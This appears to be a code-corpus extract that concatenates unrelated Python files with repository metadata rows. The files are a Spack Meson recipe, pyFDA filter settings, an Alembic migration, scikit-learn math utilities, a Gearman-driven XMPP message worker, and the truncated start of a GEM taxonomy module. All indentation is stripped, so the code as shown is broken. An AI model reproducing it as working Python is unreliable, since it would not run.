# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Meson(PythonPackage):
"""Meson is a portable open source build system meant to be both
extremely fast, and as user friendly as possible."""
homepage = "https://mesonbuild.com/"
url = "https://github.com/mesonbuild/meson/archive/0.49.0.tar.gz"
maintainers = ['michaelkuhn']
version('0.60.0', sha256='5672a560fc4094c88ca5b8be0487e099fe84357e5045f5aecf1113084800e6fd')
version('0.59.2', sha256='e6d5ccd503d41f938f6cfc4dc9e7326ffe28acabe091b1ff0c6535bdf09732dd')
version('0.59.1', sha256='f256eb15329a6064f8cc1f23b29de1fa8d21e324f939041e1a4efe77cf1362ef')
version('0.59.0', sha256='fdbbe8ea8a47f9e21cf4f578f85be8ec3d9c030df3d8cb17df1ae59d8683813a')
version('0.58.2', sha256='58115604dea9c1f70811578df3c210f4d67cf795d21a4418f6e9bb35406953f5')
version('0.58.1', sha256='78e0f553dd3bc632d5f96ab943b1bbccb599c2c84ff27c5fb7f7fff9c8a3f6b4')
version('0.58.0', sha256='991b882bfe4d37acc23c064a29ca209458764a580d52f044f3d50055a132bed4')
version('0.57.2', sha256='cd3773625253df4fd1c380faf03ffae3d02198d6301e7c8bc7bba6c66af66096')
version('0.57.1', sha256='0c043c9b5350e9087cd4f6becf6c0d10b1d618ca3f919e0dcca2cdf342360d5d')
version('0.57.0', sha256='fd26a27c1a509240c668ebd29d280649d9239cf8684ead51d5cb499d1e1188bd')
version('0.56.2', sha256='aaae961c3413033789248ffe6762589e80b6cf487c334d0b808e31a32c48f35f')
version('0.56.0', sha256='a9ca7adf66dc69fbb7e583f7c7aef16b9fe56ec2874a3d58747e69a3affdf300')
version('0.55.3', sha256='2b276df50c5b13ccdbfb14d3333141e9e7985aca31b60400b3f3e0be2ee6897e')
version('0.55.2', sha256='56244896e56c2b619f819d047b6de412ecc5250975ee8717f1e329113d178e06')
version('0.55.1', sha256='c7ebf2fff5934a974c7edd1aebb5fc9c3e1da5ae3184a29581fde917638eea39')
version('0.55.0', sha256='9034c943c8cf4d734c0e18e5ba038dd762fcdcc614c45b41703305da8382e90c')
version('0.54.3', sha256='c25caff342b5368bfe33fab6108f454fcf12e2f2cef70817205872ddef669e8b')
version('0.54.2', sha256='85cafdc70ae7d1d9d506e7356b917c649c4df2077bd6a0382db37648aa4ecbdb')
version('0.54.1', sha256='854e8b94ab36e5aece813d2b2aee8a639bd52201dfea50890722ac9128e2f59e')
version('0.54.0', sha256='95efdbaa7cb3e915ab9a7b26b1412475398fdc3e834842a780f1646c7764f2d9')
version('0.53.2', sha256='eab4f5d5dde12d002b7ddd958a9a0658589b63622b6cea2715e0235b95917888')
version('0.49.1', sha256='a944e7f25a2bc8e4ba3502ab5835d8a8b8f2530415c9d6fcffb53e0abaea2ced')
version('0.49.0', sha256='11bc959e7173e714e4a4e85dd2bd9d0149b0a51c8ba82d5f44cc63735f603c74')
version('0.42.0', sha256='6c318a2da3859326a37f8a380e3c50e97aaabff6990067218dffffea674ed76f')
version('0.41.2', sha256='2daf448d3f2479d60e30617451f09bf02d26304dd1bd12ee1de936a53e42c7a4')
version('0.41.1', sha256='a48901f02ffeb9ff5cf5361d71b1fca202f9cd72998043ad011fc5de0294cf8b')
depends_on('python@3.6:', when='@0.57.0:', type=('build', 'run'))
depends_on('python@3.5:', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('ninja', type='run')
# By default, Meson strips the rpath on installation. This patch disables
# rpath modification completely to make sure that Spack's rpath changes
# are not reverted.
patch('rpath-0.49.patch', when='@0.49:0.53')
patch('rpath-0.54.patch', when='@0.54:0.55')
patch('rpath-0.56.patch', when='@0.56:0.57')
patch('rpath-0.58.patch', when='@0.58:')
executables = ['^meson$']
@classmethod
def determine_version(cls, exe):
return Executable(exe)('--version', output=str, error=str).rstrip()
def setup_dependent_build_environment(self, env, dependent_spec):
# https://github.com/pybind/pybind11/issues/595
if self.spec.satisfies('platform=darwin'):
env.set('STRIP', 'strip -x')
| LLNL/spack | var/spack/repos/builtin/packages/meson/package.py | Python | lgpl-2.1 | 4,020 |
# -*- coding: utf-8 -*-
"""
Common design parameters for minimum order design methods
@author: Christian Muenker
"""
from __future__ import print_function, division, unicode_literals
#from importlib import import_module
#import filterbroker as fb
class min_order_common(object):
def __init__(self):
self.name = {'common':'Common filter params'}
# message for min. filter order response types:
msg_min = ("Enter the maximum pass band ripple, minimum stop band "
"attenuation and the corresponding corner frequencies.")
# VISIBLE widgets for all man. / min. filter order response types:
vis_min = ['fo','fspecs','aspecs'] # minimum filter order
# ENABLED widgets for all man. / min. filter order response types:
enb_min = ['fo','fspecs','aspecs'] # minimum filter order
# common parameters for all man. / min. filter order response types:
par_min = ['f_S', 'A_PB', 'A_SB'] # enabled widget for min. filt. order
# Common data for all man. / min. filter order response types:
# This data is merged with the entries for individual response types
# (common data comes first):
self.com = {"min":{"enb":enb_min, "msg":msg_min, "par": par_min}}
self.rt = {
"LP": {"min":{"par":['f_S','A_PB','A_SB','F_PB','F_SB']}},
"HP": {"min":{"par":['f_S','A_PB','A_SB','F_SB','F_PB']}},
"BP": {"min":{"par":['f_S','A_PB','A_SB','A_SB2',
'F_SB','F_PB','F_PB2','F_SB2']}},
"BS": {"min":{"par":['f_S','A_PB','A_SB','A_PB2',
'F_PB','F_SB','F_SB2','F_PB2']}}
# "HIL": {"man":{"par":['F_SB', 'F_PB', 'F_PB2', 'F_SB2','A_SB','A_PB','A_SB2']}}
#"DIFF":
}
| honahursey/pyFDA | work/min_order_common.py | Python | apache-2.0 | 1,902 |
"""Remove unused models
Revision ID: 3f289637f530
Revises: 4ba1dd8c3080
Create Date: 2014-04-17 11:08:50.963964
"""
# revision identifiers, used by Alembic.
revision = '3f289637f530'
down_revision = '4ba1dd8c3080'
from alembic import op
def upgrade():
op.drop_table('aggtestgroup')
op.drop_table('testgroup_test')
op.drop_table('testgroup')
op.drop_table('aggtestsuite')
def downgrade():
raise NotImplementedError
| bowlofstew/changes | migrations/versions/3f289637f530_remove_unused_models.py | Python | apache-2.0 | 442 |
"""
Extended math utilities.
"""
# Authors: Gael Varoquaux
# Alexandre Gramfort
# Alexandre T. Passos
# Olivier Grisel
# Lars Buitinck
# Stefan van der Walt
# Kyle Kastner
# Giorgio Patrini
# License: BSD 3 clause
from __future__ import division
from functools import partial
import warnings
import numpy as np
from scipy import linalg
from scipy.sparse import issparse, csr_matrix
from . import check_random_state
from .fixes import np_version
from ._logistic_sigmoid import _log_logistic_sigmoid
from ..externals.six.moves import xrange
from .sparsefuncs_fast import csr_row_norms
from .validation import check_array
from ..exceptions import NonBLASDotWarning
def norm(x):
"""Compute the Euclidean or Frobenius norm of x.
Returns the Euclidean norm when x is a vector, the Frobenius norm when x
is a matrix (2-d array). More precise than sqrt(squared_norm(x)).
"""
x = np.asarray(x)
nrm2, = linalg.get_blas_funcs(['nrm2'], [x])
return nrm2(x)
# Newer NumPy has a ravel that needs less copying.
if np_version < (1, 7, 1):
_ravel = np.ravel
else:
_ravel = partial(np.ravel, order='K')
def squared_norm(x):
"""Squared Euclidean or Frobenius norm of x.
Returns the Euclidean norm when x is a vector, the Frobenius norm when x
is a matrix (2-d array). Faster than norm(x) ** 2.
"""
x = _ravel(x)
return np.dot(x, x)
def row_norms(X, squared=False):
"""Row-wise (squared) Euclidean norm of X.
Equivalent to np.sqrt((X * X).sum(axis=1)), but also supports sparse
matrices and does not create an X.shape-sized temporary.
Performs no input validation.
"""
if issparse(X):
if not isinstance(X, csr_matrix):
X = csr_matrix(X)
norms = csr_row_norms(X)
else:
norms = np.einsum('ij,ij->i', X, X)
if not squared:
np.sqrt(norms, norms)
return norms
def fast_logdet(A):
"""Compute log(det(A)) for A symmetric
Equivalent to : np.log(nl.det(A)) but more robust.
It returns -Inf if det(A) is non positive or is not defined.
"""
sign, ld = np.linalg.slogdet(A)
if not sign > 0:
return -np.inf
return ld
def _impose_f_order(X):
"""Helper Function"""
# important to access flags instead of calling np.isfortran,
# this catches corner cases.
if X.flags.c_contiguous:
return check_array(X.T, copy=False, order='F'), True
else:
return check_array(X, copy=False, order='F'), False
def _fast_dot(A, B):
if B.shape[0] != A.shape[A.ndim - 1]: # check adopted from '_dotblas.c'
raise ValueError
if A.dtype != B.dtype or any(x.dtype not in (np.float32, np.float64)
for x in [A, B]):
warnings.warn('Falling back to np.dot. '
'Data must be of same type of either '
'32 or 64 bit float for the BLAS function, gemm, to be '
'used for an efficient dot operation. ',
NonBLASDotWarning)
raise ValueError
if min(A.shape) == 1 or min(B.shape) == 1 or A.ndim != 2 or B.ndim != 2:
raise ValueError
# scipy 0.9 compliant API
dot = linalg.get_blas_funcs(['gemm'], (A, B))[0]
A, trans_a = _impose_f_order(A)
B, trans_b = _impose_f_order(B)
return dot(alpha=1.0, a=A, b=B, trans_a=trans_a, trans_b=trans_b)
def _have_blas_gemm():
try:
linalg.get_blas_funcs(['gemm'])
return True
except (AttributeError, ValueError):
warnings.warn('Could not import BLAS, falling back to np.dot')
return False
# Only use fast_dot for older NumPy; newer ones have tackled the speed issue.
if np_version < (1, 7, 2) and _have_blas_gemm():
def fast_dot(A, B):
"""Compute fast dot products directly calling BLAS.
This function calls BLAS directly while warranting Fortran contiguity.
This helps avoiding extra copies `np.dot` would have created.
For details see section `Linear Algebra on large Arrays`:
http://wiki.scipy.org/PerformanceTips
Parameters
----------
A, B: instance of np.ndarray
Input arrays. Arrays are supposed to be of the same dtype and to
have exactly 2 dimensions. Currently only floats are supported.
In case these requirements aren't met np.dot(A, B) is returned
instead. To activate the related warning issued in this case
execute the following lines of code:
>> import warnings
>> from sklearn.exceptions import NonBLASDotWarning
>> warnings.simplefilter('always', NonBLASDotWarning)
"""
try:
return _fast_dot(A, B)
except ValueError:
# Maltyped or malformed data.
return np.dot(A, B)
else:
fast_dot = np.dot
def density(w, **kwargs):
"""Compute density of a sparse vector
Return a value between 0 and 1
"""
if hasattr(w, "toarray"):
d = float(w.nnz) / (w.shape[0] * w.shape[1])
else:
d = 0 if w is None else float((w != 0).sum()) / w.size
return d
def safe_sparse_dot(a, b, dense_output=False):
"""Dot product that handle the sparse matrix case correctly
Uses BLAS GEMM as replacement for numpy.dot where possible
to avoid unnecessary copies.
"""
if issparse(a) or issparse(b):
ret = a * b
if dense_output and hasattr(ret, "toarray"):
ret = ret.toarray()
return ret
else:
return fast_dot(a, b)
def randomized_range_finder(A, size, n_iter,
power_iteration_normalizer='auto',
random_state=None):
"""Computes an orthonormal matrix whose range approximates the range of A.
Parameters
----------
A : 2D array
The input data matrix
size : integer
Size of the return array
n_iter : integer
Number of power iterations used to stabilize the result
power_iteration_normalizer : 'auto' (default), 'QR', 'LU', 'none'
Whether the power iterations are normalized with step-by-step
QR factorization (the slowest but most accurate), 'none'
(the fastest but numerically unstable when `n_iter` is large, e.g.
typically 5 or larger), or 'LU' factorization (numerically stable
but can lose slightly in accuracy). The 'auto' mode applies no
normalization if `n_iter`<=2 and switches to LU otherwise.
.. versionadded:: 0.18
random_state : RandomState or an int seed (0 by default)
A random number generator instance
Returns
-------
Q : 2D array
A (size x size) projection matrix, the range of which
approximates well the range of the input matrix A.
Notes
-----
Follows Algorithm 4.3 of
Finding structure with randomness: Stochastic algorithms for constructing
approximate matrix decompositions
Halko, et al., 2009 (arXiv:909) http://arxiv.org/pdf/0909.4061
An implementation of a randomized algorithm for principal component
analysis
A. Szlam et al. 2014
"""
random_state = check_random_state(random_state)
# Generating normal random vectors with shape: (A.shape[1], size)
Q = random_state.normal(size=(A.shape[1], size))
# Deal with "auto" mode
if power_iteration_normalizer == 'auto':
if n_iter <= 2:
power_iteration_normalizer = 'none'
else:
power_iteration_normalizer = 'LU'
# Perform power iterations with Q to further 'imprint' the top
# singular vectors of A in Q
for i in range(n_iter):
if power_iteration_normalizer == 'none':
Q = safe_sparse_dot(A, Q)
Q = safe_sparse_dot(A.T, Q)
elif power_iteration_normalizer == 'LU':
Q, _ = linalg.lu(safe_sparse_dot(A, Q), permute_l=True)
Q, _ = linalg.lu(safe_sparse_dot(A.T, Q), permute_l=True)
elif power_iteration_normalizer == 'QR':
Q, _ = linalg.qr(safe_sparse_dot(A, Q), mode='economic')
Q, _ = linalg.qr(safe_sparse_dot(A.T, Q), mode='economic')
# Sample the range of A using by linear projection of Q
# Extract an orthonormal basis
Q, _ = linalg.qr(safe_sparse_dot(A, Q), mode='economic')
return Q
def randomized_svd(M, n_components, n_oversamples=10, n_iter='auto',
power_iteration_normalizer='auto', transpose='auto',
flip_sign=True, random_state=0):
"""Computes a truncated randomized SVD
Parameters
----------
M : ndarray or sparse matrix
Matrix to decompose
n_components : int
Number of singular values and vectors to extract.
n_oversamples : int (default is 10)
Additional number of random vectors to sample the range of M so as
to ensure proper conditioning. The total number of random vectors
used to find the range of M is n_components + n_oversamples. Smaller
number can improve speed but can negatively impact the quality of
approximation of singular vectors and singular values.
n_iter : int or 'auto' (default is 'auto')
Number of power iterations. It can be used to deal with very noisy
problems. When 'auto', it is set to 4, unless `n_components` is small
(< .1 * min(X.shape)) `n_iter` in which case is set to 7.
This improves precision with few components.
.. versionchanged:: 0.18
power_iteration_normalizer : 'auto' (default), 'QR', 'LU', 'none'
Whether the power iterations are normalized with step-by-step
QR factorization (the slowest but most accurate), 'none'
(the fastest but numerically unstable when `n_iter` is large, e.g.
typically 5 or larger), or 'LU' factorization (numerically stable
but can lose slightly in accuracy). The 'auto' mode applies no
normalization if `n_iter`<=2 and switches to LU otherwise.
.. versionadded:: 0.18
transpose : True, False or 'auto' (default)
Whether the algorithm should be applied to M.T instead of M. The
result should approximately be the same. The 'auto' mode will
trigger the transposition if M.shape[1] > M.shape[0] since this
implementation of randomized SVD tend to be a little faster in that
case.
.. versionchanged:: 0.18
flip_sign : boolean, (True by default)
The output of a singular value decomposition is only unique up to a
permutation of the signs of the singular vectors. If `flip_sign` is
set to `True`, the sign ambiguity is resolved by making the largest
loadings for each component in the left singular vectors positive.
random_state : RandomState or an int seed (0 by default)
A random number generator instance to make behavior
Notes
-----
This algorithm finds a (usually very good) approximate truncated
singular value decomposition using randomization to speed up the
computations. It is particularly fast on large matrices on which
you wish to extract only a small number of components. In order to
obtain further speed up, `n_iter` can be set <=2 (at the cost of
loss of precision).
References
----------
* Finding structure with randomness: Stochastic algorithms for constructing
approximate matrix decompositions
Halko, et al., 2009 http://arxiv.org/abs/arXiv:0909.4061
* A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert
* An implementation of a randomized algorithm for principal component
analysis
A. Szlam et al. 2014
"""
random_state = check_random_state(random_state)
n_random = n_components + n_oversamples
n_samples, n_features = M.shape
if n_iter == 'auto':
# Checks if the number of iterations is explicitely specified
# Adjust n_iter. 7 was found a good compromise for PCA. See #5299
n_iter = 7 if n_components < .1 * min(M.shape) else 4
if transpose == 'auto':
transpose = n_samples < n_features
if transpose:
# this implementation is a bit faster with smaller shape[1]
M = M.T
Q = randomized_range_finder(M, n_random, n_iter,
power_iteration_normalizer, random_state)
# project M to the (k + p) dimensional space using the basis vectors
B = safe_sparse_dot(Q.T, M)
# compute the SVD on the thin matrix: (k + p) wide
Uhat, s, V = linalg.svd(B, full_matrices=False)
del B
U = np.dot(Q, Uhat)
if flip_sign:
if not transpose:
U, V = svd_flip(U, V)
else:
# In case of transpose u_based_decision=false
# to actually flip based on u and not v.
U, V = svd_flip(U, V, u_based_decision=False)
if transpose:
# transpose back the results according to the input convention
return V[:n_components, :].T, s[:n_components], U[:, :n_components].T
else:
return U[:, :n_components], s[:n_components], V[:n_components, :]
def logsumexp(arr, axis=0):
"""Computes the sum of arr assuming arr is in the log domain.
Returns log(sum(exp(arr))) while minimizing the possibility of
over/underflow.
Examples
--------
>>> import numpy as np
>>> from sklearn.utils.extmath import logsumexp
>>> a = np.arange(10)
>>> np.log(np.sum(np.exp(a)))
9.4586297444267107
>>> logsumexp(a)
9.4586297444267107
"""
arr = np.rollaxis(arr, axis)
# Use the max to normalize, as with the log this is what accumulates
# the less errors
vmax = arr.max(axis=0)
out = np.log(np.sum(np.exp(arr - vmax), axis=0))
out += vmax
return out
def weighted_mode(a, w, axis=0):
"""Returns an array of the weighted modal (most common) value in a
If there is more than one such value, only the first is returned.
The bin-count for the modal bins is also returned.
This is an extension of the algorithm in scipy.stats.mode.
Parameters
----------
a : array_like
n-dimensional array of which to find mode(s).
w : array_like
n-dimensional array of weights for each value
axis : int, optional
Axis along which to operate. Default is 0, i.e. the first axis.
Returns
-------
vals : ndarray
Array of modal values.
score : ndarray
Array of weighted counts for each mode.
Examples
--------
>>> from sklearn.utils.extmath import weighted_mode
>>> x = [4, 1, 4, 2, 4, 2]
>>> weights = [1, 1, 1, 1, 1, 1]
>>> weighted_mode(x, weights)
(array([ 4.]), array([ 3.]))
The value 4 appears three times: with uniform weights, the result is
simply the mode of the distribution.
>>> weights = [1, 3, 0.5, 1.5, 1, 2] # deweight the 4's
>>> weighted_mode(x, weights)
(array([ 2.]), array([ 3.5]))
The value 2 has the highest score: it appears twice with weights of
1.5 and 2: the sum of these is 3.
See Also
--------
scipy.stats.mode
"""
if axis is None:
a = np.ravel(a)
w = np.ravel(w)
axis = 0
else:
a = np.asarray(a)
w = np.asarray(w)
axis = axis
if a.shape != w.shape:
w = np.zeros(a.shape, dtype=w.dtype) + w
scores = np.unique(np.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[axis] = 1
oldmostfreq = np.zeros(testshape)
oldcounts = np.zeros(testshape)
for score in scores:
template = np.zeros(a.shape)
ind = (a == score)
template[ind] = w[ind]
counts = np.expand_dims(np.sum(template, axis), axis)
mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
oldcounts = np.maximum(counts, oldcounts)
oldmostfreq = mostfrequent
return mostfrequent, oldcounts
def pinvh(a, cond=None, rcond=None, lower=True):
"""Compute the (Moore-Penrose) pseudo-inverse of a hermetian matrix.
Calculate a generalized inverse of a symmetric matrix using its
eigenvalue decomposition and including all 'large' eigenvalues.
Parameters
----------
a : array, shape (N, N)
Real symmetric or complex hermetian matrix to be pseudo-inverted
cond : float or None, default None
Cutoff for 'small' eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are considered
zero.
If None or -1, suitable machine precision is used.
rcond : float or None, default None (deprecated)
Cutoff for 'small' eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are considered
zero.
If None or -1, suitable machine precision is used.
lower : boolean
Whether the pertinent array data is taken from the lower or upper
triangle of a. (Default: lower)
Returns
-------
B : array, shape (N, N)
Raises
------
LinAlgError
If eigenvalue does not converge
Examples
--------
>>> import numpy as np
>>> a = np.random.randn(9, 6)
>>> a = np.dot(a, a.T)
>>> B = pinvh(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a = np.asarray_chkfinite(a)
s, u = linalg.eigh(a, lower=lower)
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = u.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
# unlike svd case, eigh can lead to negative eigenvalues
above_cutoff = (abs(s) > cond * np.max(abs(s)))
psigma_diag = np.zeros_like(s)
psigma_diag[above_cutoff] = 1.0 / s[above_cutoff]
return np.dot(u * psigma_diag, np.conjugate(u).T)
def cartesian(arrays, out=None):
"""Generate a cartesian product of input arrays.
Parameters
----------
arrays : list of array-like
1-D arrays to form the cartesian product of.
out : ndarray
Array to place the cartesian product in.
Returns
-------
out : ndarray
2-D array of shape (M, len(arrays)) containing cartesian products
formed of input arrays.
Examples
--------
>>> cartesian(([1, 2, 3], [4, 5], [6, 7]))
array([[1, 4, 6],
[1, 4, 7],
[1, 5, 6],
[1, 5, 7],
[2, 4, 6],
[2, 4, 7],
[2, 5, 6],
[2, 5, 7],
[3, 4, 6],
[3, 4, 7],
[3, 5, 6],
[3, 5, 7]])
"""
arrays = [np.asarray(x) for x in arrays]
shape = (len(x) for x in arrays)
dtype = arrays[0].dtype
ix = np.indices(shape)
ix = ix.reshape(len(arrays), -1).T
if out is None:
out = np.empty_like(ix, dtype=dtype)
for n, arr in enumerate(arrays):
out[:, n] = arrays[n][ix[:, n]]
return out
def svd_flip(u, v, u_based_decision=True):
"""Sign correction to ensure deterministic output from SVD.
Adjusts the columns of u and the rows of v such that the loadings in the
columns in u that are largest in absolute value are always positive.
Parameters
----------
u, v : ndarray
u and v are the output of `linalg.svd` or
`sklearn.utils.extmath.randomized_svd`, with matching inner dimensions
so one can compute `np.dot(u * s, v)`.
u_based_decision : boolean, (default=True)
If True, use the columns of u as the basis for sign flipping.
Otherwise, use the rows of v. The choice of which variable to base the
decision on is generally algorithm dependent.
Returns
-------
u_adjusted, v_adjusted : arrays with the same dimensions as the input.
"""
if u_based_decision:
# columns of u, rows of v
max_abs_cols = np.argmax(np.abs(u), axis=0)
signs = np.sign(u[max_abs_cols, xrange(u.shape[1])])
u *= signs
v *= signs[:, np.newaxis]
else:
# rows of v, columns of u
max_abs_rows = np.argmax(np.abs(v), axis=1)
signs = np.sign(v[xrange(v.shape[0]), max_abs_rows])
u *= signs
v *= signs[:, np.newaxis]
return u, v
def log_logistic(X, out=None):
"""Compute the log of the logistic function, ``log(1 / (1 + e ** -x))``.
This implementation is numerically stable because it splits positive and
negative values::
-log(1 + exp(-x_i)) if x_i > 0
x_i - log(1 + exp(x_i)) if x_i <= 0
For the ordinary logistic function, use ``sklearn.utils.fixes.expit``.
Parameters
----------
X : array-like, shape (M, N) or (M, )
Argument to the logistic function
out : array-like, shape: (M, N) or (M, ), optional:
Preallocated output array.
Returns
-------
out : array, shape (M, N) or (M, )
Log of the logistic function evaluated at every point in x
Notes
-----
See the blog post describing this implementation:
http://fa.bianp.net/blog/2013/numerical-optimizers-for-logistic-regression/
"""
is_1d = X.ndim == 1
X = np.atleast_2d(X)
X = check_array(X, dtype=np.float64)
n_samples, n_features = X.shape
if out is None:
out = np.empty_like(X)
_log_logistic_sigmoid(n_samples, n_features, X, out)
if is_1d:
return np.squeeze(out)
return out
def softmax(X, copy=True):
"""
Calculate the softmax function.
The softmax function is calculated by
np.exp(X) / np.sum(np.exp(X), axis=1)
This will cause overflow when large values are exponentiated.
Hence the largest value in each row is subtracted from each data
point to prevent this.
Parameters
----------
X : array-like, shape (M, N)
Argument to the logistic function
copy : bool, optional
Copy X or not.
Returns
-------
out : array, shape (M, N)
Softmax function evaluated at every point in x
"""
if copy:
X = np.copy(X)
max_prob = np.max(X, axis=1).reshape((-1, 1))
X -= max_prob
np.exp(X, X)
sum_prob = np.sum(X, axis=1).reshape((-1, 1))
X /= sum_prob
return X
def safe_min(X):
"""Returns the minimum value of a dense or a CSR/CSC matrix.
Adapated from http://stackoverflow.com/q/13426580
"""
if issparse(X):
if len(X.data) == 0:
return 0
m = X.data.min()
return m if X.getnnz() == X.size else min(m, 0)
else:
return X.min()
def make_nonnegative(X, min_value=0):
"""Ensure `X.min()` >= `min_value`."""
min_ = safe_min(X)
if min_ < min_value:
if issparse(X):
raise ValueError("Cannot make the data matrix"
" nonnegative because it is sparse."
" Adding a value to every entry would"
" make it no longer sparse.")
X = X + (min_value - min_)
return X
def _incremental_mean_and_var(X, last_mean=.0, last_variance=None,
last_sample_count=0):
"""Calculate mean update and a Youngs and Cramer variance update.
last_mean and last_variance are statistics computed at the last step by the
function. Both must be initialized to 0.0. In case no scaling is required
last_variance can be None. The mean is always required and returned because
necessary for the calculation of the variance. last_n_samples_seen is the
number of samples encountered until now.
From the paper "Algorithms for computing the sample variance: analysis and
recommendations", by Chan, Golub, and LeVeque.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data to use for variance update
last_mean : array-like, shape: (n_features,)
last_variance : array-like, shape: (n_features,)
last_sample_count : int
Returns
-------
updated_mean : array, shape (n_features,)
updated_variance : array, shape (n_features,)
If None, only mean is computed
updated_sample_count : int
References
----------
T. Chan, G. Golub, R. LeVeque. Algorithms for computing the sample
variance: recommendations, The American Statistician, Vol. 37, No. 3,
pp. 242-247
Also, see the sparse implementation of this in
`utils.sparsefuncs.incr_mean_variance_axis` and
`utils.sparsefuncs_fast.incr_mean_variance_axis0`
"""
# old = stats until now
# new = the current increment
# updated = the aggregated stats
last_sum = last_mean * last_sample_count
new_sum = X.sum(axis=0)
new_sample_count = X.shape[0]
updated_sample_count = last_sample_count + new_sample_count
updated_mean = (last_sum + new_sum) / updated_sample_count
if last_variance is None:
updated_variance = None
else:
new_unnormalized_variance = X.var(axis=0) * new_sample_count
if last_sample_count == 0: # Avoid division by 0
updated_unnormalized_variance = new_unnormalized_variance
else:
last_over_new_count = last_sample_count / new_sample_count
last_unnormalized_variance = last_variance * last_sample_count
updated_unnormalized_variance = (
last_unnormalized_variance +
new_unnormalized_variance +
last_over_new_count / updated_sample_count *
(last_sum / last_over_new_count - new_sum) ** 2)
updated_variance = updated_unnormalized_variance / updated_sample_count
return updated_mean, updated_variance, updated_sample_count
def _deterministic_vector_sign_flip(u):
"""Modify the sign of vectors for reproducibility
Flips the sign of elements of all the vectors (rows of u) such that
the absolute maximum element of each vector is positive.
Parameters
----------
u : ndarray
Array with vectors as its rows.
Returns
-------
u_flipped : ndarray with same shape as u
Array with the sign flipped vectors as its rows.
"""
max_abs_rows = np.argmax(np.abs(u), axis=1)
signs = np.sign(u[range(u.shape[0]), max_abs_rows])
u *= signs[:, np.newaxis]
return u
def stable_cumsum(arr, axis=None, rtol=1e-05, atol=1e-08):
"""Use high precision for cumsum and check that final value matches sum
Parameters
----------
arr : array-like
To be cumulatively summed as flat
axis : int, optional
Axis along which the cumulative sum is computed.
The default (None) is to compute the cumsum over the flattened array.
rtol : float
Relative tolerance, see ``np.allclose``
atol : float
Absolute tolerance, see ``np.allclose``
"""
# sum is as unstable as cumsum for numpy < 1.9
if np_version < (1, 9):
return np.cumsum(arr, axis=axis, dtype=np.float64)
out = np.cumsum(arr, axis=axis, dtype=np.float64)
expected = np.sum(arr, axis=axis, dtype=np.float64)
if not np.all(np.isclose(out.take(-1, axis=axis), expected, rtol=rtol,
atol=atol, equal_nan=True)):
warnings.warn('cumsum was found to be unstable: '
'its last element does not correspond to sum',
RuntimeWarning)
return out
| IshankGulati/scikit-learn | sklearn/utils/extmath.py | Python | bsd-3-clause | 27,505 |
#!/usr/bin/env python
import sleekxmpp
import sys
import gearman
import base64
import json
import logging
import configparser
CONFIG_FILE = '/home/django/projects/fun/fun/jabber.conf'
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
logging.basicConfig(format='%(asctime)s [JABBER] %(message)s', filename=config.get('Global', 'log_file'), level=logging.DEBUG)
if sys.version_info < (3, 0):
from sleekxmpp.util.misc_ops import setdefaultencoding
setdefaultencoding('utf8')
else:
raw_input = input
class SendMsgBot(sleekxmpp.ClientXMPP):
def __init__(self, jid, password, recipient, message):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.recipient = recipient
self.message = message
self.add_event_handler("session_start", self.start, threaded=True)
def start(self, event):
self.send_presence()
self.get_roster()
self.send_message(mto=self.recipient, mbody=self.message, mtype='chat')
self.disconnect(wait=True)
def task_jabber(job):
logging.debug("TEST: %s" % base64.b64decode(job.workload).decode('utf-8'))
data = json.loads(base64.b64decode(job.workload).decode('utf-8'))
username = config.get('Global', 'jabber_user')
password = config.get('Global', 'jabber_pass')
logging.info("Received message for " + data['recipient'])
xmpp = SendMsgBot(username, password, data['recipient'].strip(), data['message'])
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0045') # Multi-User Chat
xmpp.register_plugin('xep_0071') # HTML-IM
xmpp.register_plugin('xep_0199') # XMPP Ping
if xmpp.connect():
xmpp.process(block=True)
message = "Message sent."
logging.info(message)
else:
message = "Cannot connect to jabber server."
logging.error(message)
return base64.b64encode(bytes(json.dumps(message), 'utf-8'))
worker = gearman.Worker()
worker.add_servers('127.0.0.1:4730')
worker.add_func('jabber', task_jabber)
logging.info("Starting jabber worker...")
while True:
worker.work()
| mitaka/fun | workers/jabber.py | Python | gpl-2.0 | 2,127 |
# Copyright (c) 2011-2013, ImageCat Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
module supporting GEM taxonomy version 1
"""
import sqlite3
import os
import re
import copy
from operator import attrgetter
from sidd.constants import logAPICall
from sidd.taxonomy import Taxonomy, TaxonomyAttributeGroup, TaxonomyAttribute, TaxonomyAttributeValue, TaxonomyAttributeCode
from sidd.taxonomy import TaxonomyError, TaxonomyParseError
from sidd.taxonomy import TaxonomyAttributeMulticodeValue, TaxonomyAttributePairValue, TaxonomyAttributeSinglecodeValue
class GemTaxonomy(Taxonomy):
"""
main taxonomy class
"""
# protected member attributes
__GEM_TAXONOMY_FILE = 'gemdb.db'
def __init__(self):
db_path = os.path.dirname( __file__ ) + os.path.sep + self.__GEM_TAXONOMY_FILE
if not os.path.exists(db_path):
raise TaxonomyError("gem taxonomy db not found")
# open associated sqlite DB and load attributes
self.__initialized = False
self.__initialize(db_path)
@property
def name(self):
return "Gem"
@property
def description(self):
return "Gem Taxonomy"
@property
def version(self):
return "1.0"
@property
def attribute_groups(self):
return self.__attrGroups
@property
def attributes(self):
